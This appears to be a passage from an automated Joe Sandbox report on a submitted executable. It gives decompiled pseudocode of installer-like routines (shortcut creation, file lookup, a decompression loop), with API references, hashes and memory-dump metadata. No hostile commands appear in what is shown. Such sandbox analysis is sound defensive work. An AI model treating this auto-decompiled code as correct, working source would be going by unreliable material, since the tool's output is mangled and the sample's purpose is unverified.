						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409378, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409378, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x00402029
0x00402033
0x0040203c
0x00402046
0x0040204f
0x00402059
0x0040205d
0x0040205d
0x00402062
0x00402073
0x0040207b
0x0040215b
0x0040215b
0x00402162
0x00402081
0x00402081
0x00402092
0x00402096
0x0040209c
0x004020a6
0x004020a8
0x004020b3
0x004020b6
0x004020c3
0x004020c5
0x004020c7
0x004020ce
0x004020d1
0x004020d1
0x004020d4
0x004020de
0x004020e6
0x004020eb
0x004020f7
0x004020f7
0x004020fa
0x00402103
0x00402106
0x0040210f
0x00402114
0x00402126
0x00402135
0x00402137
0x00402143
0x00402143
0x00402135
0x00402145
0x0040214b
0x0040214b
0x0040214e
0x00402154
0x00402159
0x0040216e
0x00000000
0x00000000
0x00000000
0x00402159
0x00402164
0x0040288e
0x0040289a

APIs

CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409378,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D

Strings

C:\Baldi, xrefs: 004020AB

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Baldi
API String ID: 123533781-1626666659
Opcode ID: e2440bd97a0de28c640c01a9d5d42cc8b810f7137a49c2ac781f9d5420d32ae4
Instruction ID: ee874f8c2dec57c4877f78095a0f9dac743c80c93ea62094aeb2a8065092a27c
Opcode Fuzzy Hash: e2440bd97a0de28c640c01a9d5d42cc8b810f7137a49c2ac781f9d5420d32ae4
Instruction Fuzzy Hash: 07417D75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405D07 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D07(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c030);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c030;
			}

0x00405d12
0x00405d1b
0x00000000
0x00405d28
0x00405d1e
0x00000000

APIs

FindFirstFileA.KERNEL32(?,0042C030,0042B3E8,00405623,0042B3E8,0042B3E8,00000000,0042B3E8,0042B3E8,?,?,00000000,00405345,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 00405D12
FindClose.KERNEL32(00000000), ref: 00405D1E

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
Instruction ID: 6bc8dc8487d68019062fb65c0caa7a5850599756ae9c65598668cc32d68c0862
Opcode Fuzzy Hash: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
Instruction Fuzzy Hash: C5D0123195D5309BD31017797C0C85B7A58DF293317108A33F025F22E0D3749C519AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040596A(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A0C();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402656
0x0040266a
0x00402675
0x00402676
0x004027b1
0x00402658
0x00402658
0x0040265a
0x0040265c
0x0040265c
0x0040288e
0x0040289a

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 91dde0ba118db7d7ebc8a8be9eaa396cb067559f4d74f26d235d81ef142ed7f1
Instruction ID: c4edc1118dc91e0c9440d01bfde8b8f2caf312925950fbc99ec99334c7621aa2
Opcode Fuzzy Hash: 91dde0ba118db7d7ebc8a8be9eaa396cb067559f4d74f26d235d81ef142ed7f1
Instruction Fuzzy Hash: E3F0E572648101DFD700EBB49D49AEEB768DF51328FA007BBF502F20C1C2B84945DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00406128 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406128(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406897( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E004068FF( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406857))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409348 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409348 + __eax * 2) & 0x0000ffff =  *(0x409348 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409348 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409348 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409348 + __eax * 2) & 0x0000ffff =  *(0x409348 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409348 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406897( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406897( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42daf8;
												if( *0x42daf8 != 0) {
													L22:
													_t412 =  *0x40936c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409370; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c974; // 0x42d278
													_t446[5] = _t414;
													_t415 =  *0x42c970; // 0x42da78
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c978;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42cdf8;
													if(_t416 < 0x42cdf8) {
														L15:
														__eflags = _t416 - 0x42cbb4;
														_t438 = 8;
														if(_t416 > 0x42cbb4) {
															__eflags = _t416 - 0x42cd78;
															if(_t416 >= 0x42cd78) {
																__eflags = _t416 - 0x42cdd8;
																if(_t416 < 0x42cdd8) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E004068FF(0x42c978, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c974, 0x40936c, 0x42d278, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c978, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c978 + _t440;
														E004068FF(0x42c978, 0x1e, 0, 0x407408, 0x407444, 0x42c970, 0x409370, 0x42d278, _t448 - 8);
														 *0x42daf8 =  *0x42daf8 + 1;
														__eflags =  *0x42daf8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E004056A4( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406897( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
